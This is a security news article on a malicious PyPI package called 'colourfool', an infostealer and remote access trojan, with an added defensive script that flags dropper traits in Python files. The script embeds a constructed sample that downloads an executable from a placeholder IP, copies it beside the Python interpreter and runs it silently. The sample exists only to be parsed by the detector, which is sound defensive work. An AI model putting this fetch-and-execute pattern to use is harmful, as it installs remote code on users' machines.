Malicious "Colour-Blind" Infostealer with RAT Capabilities Discovered in PyPI
In a disturbing development, cybercriminals have been spotted stitching together strands of code extracted from various malware strains to develop their “own” derivatives.
After creating the digital equivalent of Frankenstein’s monster, perpetrators attempted to spread their unholy creation by dropping it into legitimate hubs such as PyPI, GitHub, RubyGems and NPM.
Recently, cybersecurity researchers discovered one such package called “colourfool” on the Python Package Index (PyPI). Dubbed “Colour-Blind” by the experts, the Python-written tool concealed a fully-fledged information stealer with remote access trojan (RAT) capabilities.
A “suspiciously large” Python file drew the attention of the researchers, who discovered its hidden purpose: to covertly retrieve a file from the Internet, conceal it from users, and execute it on the machine where it was downloaded.
“Other suspicious aspects of this script were the redirection of the standard out process to a ‘null device,’ and the copying of the downloaded file into the same directory in which the interpreter ‘python.exe’ resides,” reads Kroll’s security advisory. “The copy functionality is preceded by a check, resulting in a forced exit if the file already exists. This is a common method the malware uses to avoid reinfection.”
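The behaviours Kroll lists are individually ordinary but rarely appear together in a legitimate package, which makes them a usable static triage signature. The script below is an added example, not Kroll's tooling and not the "colourfool" code: it parses a Python file into an AST and flags the five indicators described above (a download from the Internet, standard output sent to a null device, a copy into the directory of the running interpreter, an exit when the target already exists, and execution of the dropped file), plus the "suspiciously large" size hint. The call-name lists, the size threshold and the `SAMPLE` snippet are assumptions; `SAMPLE` is a constructed imitation of the described pattern that is only parsed, never executed.

```python
"""Static triage of a Python file for the dropper indicators described in the advisory.

Added example (not Kroll's tooling, not the colourfool code). Requires Python 3.9+
for ast.unparse.
"""
import ast
import os
from dataclasses import dataclass

# Coarse call-name lists (assumed; tune them for your own corpus).
NETWORK_CALLS = {"urlopen", "urlretrieve", "get", "request"}
EXEC_CALLS = {"Popen", "run", "call", "check_output", "system", "startfile", "exec"}
COPY_CALLS = {"copy", "copyfile", "copy2", "move", "rename"}
EXIT_CALLS = {"exit", "_exit", "quit"}

# Constructed sample that mimics the described pattern; it is parsed, never run.
SAMPLE = '''
import os, sys, shutil, subprocess, urllib.request
target = os.path.join(os.path.dirname(sys.executable), "helper.exe")
if os.path.exists(target):
    sys.exit()
urllib.request.urlretrieve("http://203.0.113.5/helper.exe", "helper.exe")
shutil.copy("helper.exe", target)
subprocess.Popen([target], stdout=open(os.devnull, "w"), stderr=subprocess.DEVNULL)
'''


@dataclass
class Finding:
    kind: str
    lineno: int
    snippet: str


def _call_name(call: ast.Call) -> str:
    func = call.func
    if isinstance(func, ast.Attribute):
        return func.attr
    return func.id if isinstance(func, ast.Name) else ""


def _mentions_null_device(node: ast.AST) -> bool:
    """os.devnull, subprocess.DEVNULL, or the literal paths /dev/null and NUL."""
    text = ast.unparse(node)
    if "os.devnull" in text or "DEVNULL" in text:
        return True
    return any(
        isinstance(n, ast.Constant) and isinstance(n.value, str)
        and n.value.upper() in ("/DEV/NULL", "NUL")
        for n in ast.walk(node)
    )


def _interpreter_derived_names(tree: ast.AST) -> set[str]:
    """One-hop taint: variables assigned from an expression that uses sys.executable."""
    names: set[str] = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign) and "sys.executable" in ast.unparse(node.value):
            names.update(t.id for t in node.targets if isinstance(t, ast.Name))
    return names


def _exits(body: list) -> bool:
    """True if the statements call sys.exit()/os._exit()/quit() or raise SystemExit."""
    for stmt in body:
        for sub in ast.walk(stmt):
            if isinstance(sub, ast.Call) and _call_name(sub) in EXIT_CALLS:
                return True
            if isinstance(sub, ast.Raise) and "SystemExit" in ast.unparse(sub):
                return True
    return False


def triage_source(src: str) -> list[Finding]:
    tree = ast.parse(src)
    tainted = _interpreter_derived_names(tree)
    findings: list[Finding] = []

    def add(kind: str, node: ast.AST) -> None:
        findings.append(Finding(kind, node.lineno, ast.unparse(node).splitlines()[0]))

    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name, text = _call_name(node), ast.unparse(node)
            if "http://" in text or "https://" in text or (name in NETWORK_CALLS and "url" in text.lower()):
                add("network_fetch", node)
            if name in COPY_CALLS and any(
                ast.unparse(a) in tainted or "sys.executable" in ast.unparse(a) for a in node.args
            ):
                add("interpreter_dir_copy", node)
            if name in EXEC_CALLS:
                add("execute", node)
        elif isinstance(node, ast.If):
            test = ast.unparse(node.test)
            if ("exists(" in test or "isfile(" in test) and _exits(node.body):
                add("exit_if_present", node.test)
        # Statement-level check so a Popen(..., stdout=open(os.devnull)) is flagged once.
        if isinstance(node, (ast.Expr, ast.Assign, ast.With)) and _mentions_null_device(node):
            add("stdout_to_null", node)
    return findings


def is_dropper_like(findings: list[Finding], minimum: int = 3) -> bool:
    """Any one indicator is common in benign code; several distinct ones together are not."""
    return len({f.kind for f in findings}) >= minimum


def triage_file(path: str, large_bytes: int = 250_000) -> list[Finding]:
    """Wrap triage_source with the size hint; the threshold is an assumed value."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        findings = triage_source(fh.read())
    size = os.path.getsize(path)
    if size > large_bytes:
        findings.append(Finding("oversized", 0, f"{size} bytes"))
    return findings


if __name__ == "__main__":
    for f in triage_source(SAMPLE):
        print(f"line {f.lineno:>3}  {f.kind:<20} {f.snippet}")
    print("dropper-like:", is_dropper_like(triage_source(SAMPLE)))
```

The name lists are deliberately coarse (`run` also matches `app.run()`, `copy` matches `dict.copy()`), which is why `is_dropper_like` scores distinct indicator kinds rather than raw hits; run `triage_file` over every `.py` in an unpacked sdist or wheel and review anything that crosses the threshold by hand.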
Aside from its obvious info-stealer and RAT nature, “Colour-Blind” boasted antivirus software evasion capabilities and vestigial obfuscation techniques.
The researchers noted that threat actors could easily weaponize modern languages like Python to inject common malware functionality. Further analysis showed them that, like this particular malicious package, “multiple variants can be spawned from code sourced from others.”
This discovery highlights the need for developers to exercise caution when downloading packages, even from trusted platforms. While third-party packages are valuable for speeding up development and improving code quality, any one of them could carry malicious code.